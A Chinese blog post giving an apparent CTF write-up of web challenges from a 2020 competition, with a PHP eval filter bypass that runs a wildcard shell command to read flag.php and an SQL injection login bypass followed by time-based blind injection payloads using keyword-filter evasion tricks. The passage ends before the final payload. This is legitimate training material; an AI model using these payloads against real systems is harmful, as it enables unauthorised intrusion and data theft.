<!DOCTYPE html>
<html lang="zh-Hans">
    <!-- title -->




<!-- keywords -->




<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no" >
    <meta name="author" content="c1ay">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="c1ay">
    
    <meta name="keywords" content="hexo,hexo-theme,hexo-blog">
    
    <meta name="description" content="信息安全技术博客">
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>
    <title>2020全国电信和互联网行业网络安全竞赛线下个人赛wp · c1ay&#39;s blog</title>
    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .back-top,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(-45deg, #444 0, #444 80px, #333 80px, #333 160px);
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }

</style>

    <link rel="preload" href= "/css/style.css?v=20180824" as="style" onload="this.onload=null;this.rel='stylesheet'" />
    <link rel="stylesheet" href= "/css/mobile.css?v=20180824" media="(max-width: 980px)">
    
    <link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'" />
    
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
(function( w ){
	"use strict";
	// rel=preload support test
	if( !w.loadCSS ){
		w.loadCSS = function(){};
	}
	// define on the loadCSS obj
	var rp = loadCSS.relpreload = {};
	// rel=preload feature support test
	// runs once and returns a function for compat purposes
	rp.support = (function(){
		var ret;
		try {
			ret = w.document.createElement( "link" ).relList.supports( "preload" );
		} catch (e) {
			ret = false;
		}
		return function(){
			return ret;
		};
	})();

	// if preload isn't supported, get an asynchronous load by using a non-matching media attribute
	// then change that media back to its intended value on load
	rp.bindMediaToggle = function( link ){
		// remember existing media attr for ultimate state, or default to 'all'
		var finalMedia = link.media || "all";

		function enableStylesheet(){
			link.media = finalMedia;
		}

		// bind load handlers to enable media
		if( link.addEventListener ){
			link.addEventListener( "load", enableStylesheet );
		} else if( link.attachEvent ){
			link.attachEvent( "onload", enableStylesheet );
		}

		// Set rel and non-applicable media type to start an async request
		// note: timeout allows this to happen async to let rendering continue in IE
		setTimeout(function(){
			link.rel = "stylesheet";
			link.media = "only x";
		});
		// also enable media after 3 seconds,
		// which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
		setTimeout( enableStylesheet, 3000 );
	};

	// loop through link elements in DOM
	rp.poly = function(){
		// double check this to prevent external calls from running
		if( rp.support() ){
			return;
		}
		var links = w.document.getElementsByTagName( "link" );
		for( var i = 0; i < links.length; i++ ){
			var link = links[ i ];
			// qualify links to those with rel=preload and as=style attrs
			if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
				// prevent rerunning on link
				link.setAttribute( "data-loadcss", true );
				// bind listeners to toggle media back
				rp.bindMediaToggle( link );
			}
		}
	};

	// if unsupported, run the polyfill
	if( !rp.support() ){
		// run once at least
		rp.poly();

		// rerun poly on an interval until onload
		var run = w.setInterval( rp.poly, 500 );
		if( w.addEventListener ){
			w.addEventListener( "load", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		} else if( w.attachEvent ){
			w.attachEvent( "onload", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		}
	}


	// commonjs
	if( typeof exports !== "undefined" ){
		exports.loadCSS = loadCSS;
	}
	else {
		w.loadCSS = loadCSS;
	}
}( typeof global !== "undefined" ? global : this ) );
</script>

    <link rel="icon" href= "/assets/naruto.ico" />
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js" as="script" />
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" as="script" />
    <link rel="preload" href="/scripts/main.js" as="script" />
    <link rel="preload" as="font" href="/font/Oswald-Regular.ttf" crossorigin>
    <link rel="preload" as="font" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" crossorigin>
    
    <!-- fancybox -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script>
    <!-- 百度统计  -->
    
    <!-- 谷歌统计  -->
    
</head>

    
        <body class="post-body">
    
    
<header class="header">

    <div class="read-progress"></div>
    <div class="header-sidebar-menu">&#xe775;</div>
    <!-- post页的toggle banner  -->
    
    <div class="banner">
            <div class="blog-title">
                <a href="/" >c1ay&#39;s blog</a>
            </div>
            <div class="post-title">
                <a href="#" class="post-name">2020全国电信和互联网行业网络安全竞赛线下个人赛wp</a>
            </div>
    </div>
    
    <a class="home-link" href=/>c1ay's blog</a>
</header>
    <div class="wrapper">
        <div class="site-intro" style="







height:50vh;
">
    
    <!-- 主页  -->
    
    
    <!-- 404页  -->
            
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(/intro/post-bg.jpg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
            
            2020全国电信和互联网行业网络安全竞赛线下个人赛wp
            <!-- 404 -->
            
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            
            
            <!-- 404 -->
            
        </p>
        <!-- 文章页meta -->
        
            <div class="post-intros">
                <!-- 文章页标签  -->
                
                    <div class= post-intro-tags >
    
        <a class="post-tag" href="javascript:void(0);" data-tags = "ctf">ctf</a>
    
</div>
                
                
                    <div class="post-intro-read">
                        <span>Word count: <span class="post-count word-count">2.5k</span>Reading time: <span class="post-count reading-time">11 min</span></span>
                    </div>
                
                <div class="post-intro-meta">
                    <span class="post-intro-calander iconfont-archer">&#xe676;</span>
                    <span class="post-intro-time">2021/01/15</span>
                    
                    <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                        <span class="iconfont-archer">&#xe602;</span>
                        <span id="busuanzi_value_page_pv"></span>
                    </span>
                    
                    <span class="shareWrapper">
                        <span class="iconfont-archer shareIcon">&#xe71d;</span>
                        <span class="shareText">Share</span>
                        <ul class="shareList">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
        
    </div>
</div>
        <script>
 
  // get user agent
  var browser = {
    versions: function () {
      var u = window.navigator.userAgent;
      return {
        userAgent: u,
        trident: u.indexOf('Trident') > -1, //IE内核
        presto: u.indexOf('Presto') > -1, //opera内核
        webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
        gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
        mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
        ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
        android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
        iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
        iPad: u.indexOf('iPad') > -1, //是否为iPad
        webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
        weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
        uc: u.indexOf('UCBrowser') > -1 //是否为android下的UC浏览器
      };
    }()
  }
  console.log("userAgent:" + browser.versions.userAgent);

  // callback
  function fontLoaded() {
    console.log('font loaded');
    if (document.getElementsByClassName('site-intro-meta')) {
      document.getElementsByClassName('intro-title')[0].classList.add('intro-fade-in');
      document.getElementsByClassName('intro-subtitle')[0].classList.add('intro-fade-in');
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in');
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb(){
    if (browser.versions.uc) {
      console.log("UCBrowser");
      fontLoaded();
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular']
        },
        loading: function () {  //所有字体开始加载
          // console.log('loading');
        },
        active: function () {  //所有字体已渲染
          fontLoaded();
        },
        inactive: function () { //字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout');
          fontLoaded();
        },
        timeout: 5000 // Set the timeout to two seconds
      });
    }
  }

  function asyncErr(){
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (cb) { o.addEventListener('load', function (e) { cb(null, e); }, false); }
    if (err) { o.addEventListener('error', function (e) { err(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }

  var asyncLoadWithFallBack = function(arr, success, reject) {
      var currReject = function(){
        reject()
        arr.shift()
        if(arr.length)
          async(arr[0], success, currReject)
        }

      async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack([
    "https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js", 
    "https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js",
    "/lib/webfontloader.min.js"
  ], asyncCb, asyncErr)
</script>        
        <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" />
        <div class="container container-unloaded">
            <main class="main post-page">
    <article class="article-entry">
        <h3 id="序"><a href="#序" class="headerlink" title="序"></a>序</h3><p>12月份参加的线下赛，补一下，个人赛成绩不怎么好，在这记录一下</p>
<h3 id="web"><a href="#web" class="headerlink" title="web"></a>web</h3><p><strong>web3:</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line">error_reporting(<span class="number">0</span>);</div><div class="line"><span class="comment">//flag is located in flag.php</span></div><div class="line"><span class="keyword">if</span>( <span class="keyword">isset</span>($_GET[<span class="string">'a'</span>]) )&#123;</div><div class="line">    $a = $_GET[<span class="string">'a'</span>];</div><div class="line">    <span class="keyword">if</span>( strlen($a)&gt;<span class="number">27</span> )&#123;</div><div class="line">        <span class="keyword">die</span>(strval(strlen($a)) . <span class="string">" Long."</span>);</div><div class="line">    &#125;</div><div class="line">    <span class="keyword">if</span>( preg_match(<span class="string">"/[A-Zb-z0-9_$.&amp;;|^~![\]()&#123;&#125;\$@\*]+/"</span>, $a) )&#123;</div><div class="line">        <span class="keyword">die</span>(<span class="string">"NO."</span>);</div><div class="line">    &#125;</div><div class="line">   <span class="keyword">eval</span>(<span class="string">"echo '"</span> . $a .<span class="string">"';"</span>);</div><div class="line">&#125; <span class="keyword">else</span> &#123;</div><div class="line">    show_source(<span class="keyword">__FILE__</span>);</div><div class="line">&#125;</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure>
<p>安恒17年月赛出过类似的</p>
<p>过滤了<code>^~</code>等，导致不能异或取反绕过</p>
<p>过滤了<code>[]@</code>等字符，导致不能上传临时文件使用通配符匹配临时文件执行的方式（p牛之前提出的方法）</p>
<p>之前也看过一叶飘零师傅提供的方法：</p>
<p>是构造</p>
<pre><code>&apos;?&gt;&lt;?=`/???/??? ????????`?&gt;
</code></pre><p>‘是为了闭合这里代码里的echo，之后使用?&gt;闭合之前的代码，&lt;?=?&gt;这里起到了echo的作用</p>
<p>这里的/???/??? ????????是为了匹配到<code>/bin/cat flag.php</code></p>
<p>但是这样直接发过去目标会被卡死，因为匹配到的结果有很多</p>
<p>仔细看代码发现没有过滤a，于是可以通过以下的方式</p>
<pre><code>&apos;?&gt;&lt;?=`/???/?a? ??a?????`?&gt;
</code></pre><p>访问</p>
<pre><code>http://10.10.22.12/?a=%27?%3E%3C?=`/???/?a?%20??a?????`?%3E
</code></pre><p><img src="http://pic.c1imber.top/blog/20210115/6pvr0W6UFWmt.png?imageslim" alt="mark"></p>
<p>获取flag:<br>flag{ZqhzwSifav4zf2ejop2ieKqxwQaEBOXf}</p>
<p><strong>web1:</strong></p>
<p>没做出，说一下思路</p>
<p>打开题目说需要登录</p>
<p><img src="http://pic.c1imber.top/blog/20210115/wNNLLKTxEFRC.png?imageslim" alt="mark"></p>
<p>这里过滤了很多字符，例如<code>or、in、空格、=、&gt;、&lt;、like、^、regexp、substr、mid、right等等</code></p>
<p>登录很好构造，构造下面的payload就可以登录成功</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">username=&apos;UNION/**/SELECT/**/1,2,3%23&amp;password=</div></pre></td></tr></table></figure>
<p><img src="http://pic.c1imber.top/blog/20210115/Ub94hMeMfIK5.png?imageslim" alt="mark"></p>
<p>这里还输出了sql语句</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">SELECT * FROM users WHERE username=&apos;&apos;UNION/**/SELECT/**/1,2,3#&apos; and passwd=&apos;&apos;;</div></pre></td></tr></table></figure>
<p>猜测后端逻辑大概是：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">$sql=<span class="string">"SELECT * FROM users WHERE username='"</span>.$_POST[username].<span class="string">"' and passwd='"</span>.$_POST[password].<span class="string">"'"</span>;</div><div class="line">$result=mysql_query($sql);</div><div class="line"><span class="keyword">if</span>(mysql_num_rows($result)&gt;<span class="number">0</span>)</div><div class="line">&#123;</div><div class="line">   	<span class="keyword">echo</span> <span class="string">"welcome Admin!"</span>;</div><div class="line">&#125;</div></pre></td></tr></table></figure>
<p>可以看到这里登录成功后除了welcome Admin!之外什么也没有</p>
<p>盯着题目看了好久无从下手，只能换个思路尝试盲注，当时首先想到的是时间盲注</p>
<p>发现sleep被过滤了、这里通过<code>benchmark(10000000,md5(1))</code>可以绕过</p>
<p><img src="http://pic.c1imber.top/blog/20210115/UX5LfKuCV15h.png?imageslim" alt="mark"></p>
<p>于是可以通过：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">username=&apos;UNION/**/SELECT/**/1,if(1,benchmark(10000000,md5(1)),1),3%23&amp;password=</div></pre></td></tr></table></figure>
<p>-&gt;延时</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">username=&apos;UNION/**/SELECT/**/1,if(0,benchmark(10000000,md5(1)),1),3%23&amp;password=</div></pre></td></tr></table></figure>
<p>-&gt;正常响应</p>
<p>这样的方式去进行时间盲注判断</p>
<p>这里需要突破的两个地方：<br>1、过滤了<code>=、&gt;、&lt;、^、like、regexp</code>等字符，如何构造布尔逻辑判断<br>2、过滤了<code>substr、mid、in、right</code>等，如何逐位截取字符串</p>
<p>突破第一点：</p>
<p>方法一：</p>
<p>经过测试找到方法，可以通过/除号进行布尔逻辑判断，这里通过<code>cast(除法运算结果 as char(1))</code>可以将运算结果转为0和1，由此就可以解决构造布尔判断的问题</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div></pre></td><td class="code"><pre><div class="line">mysql&gt; select ascii(version());</div><div class="line">+------------------+</div><div class="line">| ascii(version()) |</div><div class="line">+------------------+</div><div class="line">|               53 |</div><div class="line">+------------------+</div><div class="line">1 row in set (0.00 sec)	</div><div class="line"></div><div class="line">mysql&gt; select cast(ascii(version())/52 as char(1));</div><div class="line">+--------------------------------------+</div><div class="line">| cast(ascii(version())/52 as char(1)) |</div><div class="line">+--------------------------------------+</div><div class="line">| 1                                    |</div><div class="line">+--------------------------------------+</div><div class="line">1 row in set, 1 warning (0.01 sec)	</div><div class="line"></div><div class="line">mysql&gt; select cast(ascii(version())/53 as char(1));</div><div class="line">+--------------------------------------+</div><div class="line">| cast(ascii(version())/53 as char(1)) |</div><div class="line">+--------------------------------------+</div><div class="line">| 1                                    |</div><div class="line">+--------------------------------------+</div><div class="line">1 row in set, 1 warning (0.00 sec)	</div><div class="line"></div><div class="line">mysql&gt; select cast(ascii(version())/54 as char(1));</div><div class="line">+--------------------------------------+</div><div class="line">| cast(ascii(version())/54 as char(1)) |</div><div class="line">+--------------------------------------+</div><div class="line">| 0                                    |</div><div class="line">+--------------------------------------+</div><div class="line">1 row in set, 1 warning (0.00 sec)</div></pre></td></tr></table></figure>
<p>获取表名，这里就能够成功获取到当前数据库<code>group_concat(table_name)</code>的第一个字符和长度了</p>
<p>因为这里过滤了<code>in</code>，所以用<code>sys.schema_table_statistics代替information_schema</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">username=&apos;UNION/**/SELECT/**/1,if((select/**/cast(((select/**/length(group_concat(table_name))/**/from/**/sys.schema_table_statistics)/14)/**/as/**/char(1))),benchmark(10000000,md5(1)),1),&apos;111&apos;%23&amp;password=</div></pre></td></tr></table></figure>
<p>-&gt;延时</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">username=&apos;UNION/**/SELECT/**/1,if((select/**/cast(((select/**/length(group_concat(table_name))/**/from/**/sys.schema_table_statistics)/15)/**/as/**/char(1))),benchmark(10000000,md5(1)),1),&apos;111&apos;%23&amp;password=</div></pre></td></tr></table></figure>
<p>-&gt;正常响应</p>
<p>所以当前数据库表名长度为14</p>
<p><img src="http://pic.c1imber.top/blog/20210115/wwqnoC6ODPQ2.png?imageslim" alt="mark"></p>
<p><img src="http://pic.c1imber.top/blog/20210115/2NTpYxjAQUG4.png?imageslim" alt="mark"></p>
<p>第一个字符</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">username=&apos;UNION/**/SELECT/**/1,if((select/**/cast(((select/**/ascii(left(group_concat(table_name),1))/**/from/**/sys.schema_table_statistics)/117)/**/as/**/char(1))),benchmark(10000000,md5(1)),1),&apos;111&apos;%23&amp;password=1</div></pre></td></tr></table></figure>
<p>-&gt;延时</p>
<p><img src="http://pic.c1imber.top/blog/20210115/IFhE8uUmvff9.png?imageslim" alt="mark"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">username=&apos;UNION/**/SELECT/**/1,if((select/**/cast(((select/**/ascii(left(group_concat(table_name),1))/**/from/**/sys.schema_table_statistics)/118)/**/as/**/char(1))),benchmark(10000000,md5(1)),1),&apos;111&apos;%23&amp;password=1</div></pre></td></tr></table></figure>
<p>-&gt;正常响应</p>
<p><img src="http://pic.c1imber.top/blog/20210115/XB5cXeEVrjWq.png?imageslim" alt="mark"></p>
<p>判断出<code>group_concat(table_name)</code>第一个字符的ascii码为117,也就是u</p>
<p>方法二：</p>
<p>使用between and</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div></pre></td><td class="code"><pre><div class="line">mysql&gt; select version();</div><div class="line">+-------------------------+</div><div class="line">| version()               |</div><div class="line">+-------------------------+</div><div class="line">| 5.7.32-0ubuntu0.16.04.1 |</div><div class="line">+-------------------------+</div><div class="line">1 row in set (0.00 sec)	</div><div class="line"></div><div class="line">mysql&gt; select ascii(version());</div><div class="line">+------------------+</div><div class="line">| ascii(version()) |</div><div class="line">+------------------+</div><div class="line">|               53 |</div><div class="line">+------------------+</div><div class="line">1 row in set (0.00 sec)	</div><div class="line"></div><div class="line">mysql&gt; select ascii(version()) between 1 and 52;</div><div class="line">+-----------------------------------+</div><div class="line">| ascii(version()) between 1 and 52 |</div><div class="line">+-----------------------------------+</div><div class="line">|                                 0 |</div><div class="line">+-----------------------------------+</div><div class="line">1 row in set (0.00 sec)	</div><div class="line"></div><div class="line">mysql&gt; select ascii(version()) between 1 and 53;</div><div class="line">+-----------------------------------+</div><div class="line">| ascii(version()) between 1 and 53 |</div><div class="line">+-----------------------------------+</div><div class="line">|                                 1 |</div><div class="line">+-----------------------------------+</div><div class="line">1 row in set (0.00 sec)</div></pre></td></tr></table></figure>
<p>突破第二点：</p>
<p>因为ascii只能获取到第一个字符的ascii码，而且这里过滤了大部分常见的<code>substr、mid</code>字符串截取函数，并且过滤了一些特殊字符，导致情况变的有些困难</p>
<p>1、如果要使用<code>trim</code>去进行判断的话，需要用到leading和trailing，但是这里过滤了in</p>
<p>用法：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div></pre></td><td class="code"><pre><div class="line">trim(leading &apos;s1&apos; from &apos;s2&apos;) 从左边截取，删除字符串s2当中的字符串s1</div><div class="line">trim(trailing &apos;s1&apos; from &apos;s2&apos;) 从右边截取，删除字符串s2当中的字符串s1</div><div class="line">mysql&gt; select ascii(trim(version()));</div><div class="line">+------------------------+</div><div class="line">| ascii(trim(version())) |</div><div class="line">+------------------------+</div><div class="line">|                     53 |</div><div class="line">+------------------------+</div><div class="line">1 row in set (0.00 sec)	</div><div class="line"></div><div class="line">mysql&gt; select trim(leading &apos;5&apos; from version());</div><div class="line">+----------------------------------+</div><div class="line">| trim(leading &apos;5&apos; from version()) |</div><div class="line">+----------------------------------+</div><div class="line">| .7.32-0ubuntu0.16.04.1           |</div><div class="line">+----------------------------------+</div><div class="line">1 row in set (0.00 sec)	</div><div class="line"></div><div class="line">mysql&gt; select ascii(trim(leading &apos;5&apos; from version()));</div><div class="line">+-----------------------------------------+</div><div class="line">| ascii(trim(leading &apos;5&apos; from version())) |</div><div class="line">+-----------------------------------------+</div><div class="line">|                                      46 |</div><div class="line">+-----------------------------------------+</div><div class="line">1 row in set (0.00 sec)	</div><div class="line"></div><div class="line">mysql&gt; select trim(leading &apos;5.&apos; from version());</div><div class="line">+-----------------------------------+</div><div class="line">| trim(leading &apos;5.&apos; from version()) |</div><div class="line">+-----------------------------------+</div><div class="line">| 7.32-0ubuntu0.16.04.1             |</div><div class="line">+-----------------------------------+</div><div class="line">1 row in set (0.00 sec)</div></pre></td></tr></table></figure>
<p>2、过滤了right，导致下面方法不能用：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div></pre></td><td class="code"><pre><div class="line">mysql&gt; select version();</div><div class="line">+-------------------------+</div><div class="line">| version()               |</div><div class="line">+-------------------------+</div><div class="line">| 5.7.32-0ubuntu0.16.04.1 |</div><div class="line">+-------------------------+</div><div class="line">1 row in set (0.00 sec)	</div><div class="line"></div><div class="line">mysql&gt; select right(left(version(),2),1);</div><div class="line">+----------------------------+</div><div class="line">| right(left(version(),2),1) |</div><div class="line">+----------------------------+</div><div class="line">| .                          |</div><div class="line">+----------------------------+</div><div class="line">1 row in set (0.00 sec)	</div><div class="line"></div><div class="line">mysql&gt; select right(left(version(),3),1);</div><div class="line">+----------------------------+</div><div class="line">| right(left(version(),3),1) |</div><div class="line">+----------------------------+</div><div class="line">| 7                          |</div><div class="line">+----------------------------+</div><div class="line">1 row in set (0.00 sec)</div></pre></td></tr></table></figure>
<p>绕过方法：</p>
<p>1、可以使用replace，猜测出第一个字符后，把该字符替换为空，这样依次处理</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div></pre></td><td class="code"><pre><div class="line">mysql&gt; select replace(version(),&apos;5.&apos;,&apos;&apos;);</div><div class="line">+----------------------------+</div><div class="line">| replace(version(),&apos;5.&apos;,&apos;&apos;) |</div><div class="line">+----------------------------+</div><div class="line">| 7.32-0ubuntu0.16.04.1      |</div><div class="line">+----------------------------+</div><div class="line">1 row in set (0.00 sec)	</div><div class="line"></div><div class="line">mysql&gt; select replace(version(),&apos;5.7&apos;,&apos;&apos;);</div><div class="line">+-----------------------------+</div><div class="line">| replace(version(),&apos;5.7&apos;,&apos;&apos;) |</div><div class="line">+-----------------------------+</div><div class="line">| .32-0ubuntu0.16.04.1        |</div><div class="line">+-----------------------------+</div><div class="line">1 row in set (0.00 sec)</div></pre></td></tr></table></figure>
<p>方法缺陷：<br>加入flag数据如：flag{123123},当判断到第3个字符后，第四次判断是<code>replace</code>把123变成空，导致不能正常判断了</p>
<p>方法改进：使用<code>replace+left</code>组合的方式（这种方法也有一些小的缺陷，如果刚好第一个字符和第二个字符一样，那么使用left依旧不能解决这种问题，不过只要遇到了这个缺陷，那么在知道内容长度的情况下，就可以判断出第二个字符了）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div></pre></td><td class="code"><pre><div class="line">mysql&gt; select replace(&apos;123123&apos;,&apos;123&apos;,&apos;&apos;);</div><div class="line">+----------------------------+</div><div class="line">| replace(&apos;123123&apos;,&apos;123&apos;,&apos;&apos;) |</div><div class="line">+----------------------------+</div><div class="line">|                            |</div><div class="line">+----------------------------+</div><div class="line">1 row in set (0.00 sec)	</div><div class="line"></div><div class="line">mysql&gt; select replace(left(&apos;123123&apos;,4),&apos;123&apos;,&apos;&apos;);</div><div class="line">+------------------------------------+</div><div class="line">| replace(left(&apos;123123&apos;,4),&apos;123&apos;,&apos;&apos;) |</div><div class="line">+------------------------------------+</div><div class="line">| 1                                  |</div><div class="line">+------------------------------------+</div><div class="line">1 row in set (0.00 sec)	</div><div class="line"></div><div class="line">mysql&gt; select replace(left(&apos;123123&apos;,5),&apos;1231&apos;,&apos;&apos;);</div><div class="line">+-------------------------------------+</div><div class="line">| replace(left(&apos;123123&apos;,5),&apos;1231&apos;,&apos;&apos;) |</div><div class="line">+-------------------------------------+</div><div class="line">| 2                                   |</div><div class="line">+-------------------------------------+</div><div class="line">1 row in set (0.00 sec)</div></pre></td></tr></table></figure>
<p>最终构造：</p>
